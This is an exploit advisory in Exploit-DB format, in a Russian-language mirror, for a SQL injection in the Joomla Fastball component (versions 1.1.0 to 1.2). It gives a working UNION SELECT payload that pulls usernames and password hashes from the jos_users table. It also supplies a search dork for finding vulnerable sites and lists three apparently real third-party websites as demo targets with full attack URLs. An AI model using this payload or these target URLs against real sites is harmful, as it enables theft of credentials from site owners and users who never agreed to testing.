Exploit Joomla! Component Fastball 1.1.0 < 1.2 - 'league' SQL Injection

[Exploiter]

EDB-ID

9822

Проверка EDB

1. Пройдено

Автор

KAMTIEZ

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2009-3443

Дата публикации

2009-09-24

########################################################################################################
## Joomla Component com_fastball Remote SQL injection vulnerability - (league)	      		      ##
## Author : kaMtiEz ([email protected])							      ##
## Homepage : http://www.indonesiancoder.com    	     					      ##
## Date : September 23, 2009 									      ##
########################################################################################################
# Hello My Name Is :                                                                                  ##
#  __               _____   __  ._____________                                                        ##
# |  | _______     /     \_/  |_|__\_   _____/_______                                                 ##
# |  |/ /\__  \   /  \ /  \   __\  ||    __)_\___   /                                                 ##
# |    <  / __ \_/    Y    \  | |  ||        \/    /                                                  ##
# |__|_ \(____  /\____|__  /__| |__/_______  /_____ \                                                 ##
#      \/     \/         \/                \/      \/ -=- INDONESIAN CODER -=- KILL-9 CREW -=-        ##
########################################################################################################

[ Software Information ]

[+] Vendor : http://www.fastballproductions.com/
[+] Download : http://www.fastballproductions.com/index.php?option=com_digistore&task=list_products&id=1&Itemid=32
[+] version : 1.1.0 - 1.2
[+] Vulnerability : SQL injection
[+] Dork : inurl:"com_fastball"
[+] Location : INDONESIA
#############################################################################################################

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_fastball&league=[INDONESIANCODER]

[ Exploit ]

-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11+from+jos_users--

[ Demo ]

http://diamondblacks.com/index.php?option=com_fastball&league=-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11+from+jos_users--

http://sandiegoturbos.com/index.php?option=com_fastball&league=-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11+from+jos_users--

http://www.unibaseball.co.uk/index.php?option=com_fastball&league=-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11+from+jos_users--

#############################################################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy,devil_nongkrong and YOU!!

[ NOTE ] 

[+] makasih buad babe and enyak .... muach ..
[+] makasih buat om tukulesto yg menemani saia selalu dan enggak bosen ma gue .. hahaha
[+] aurakasih napa sih lo susah banget di hubungi ?? .. hha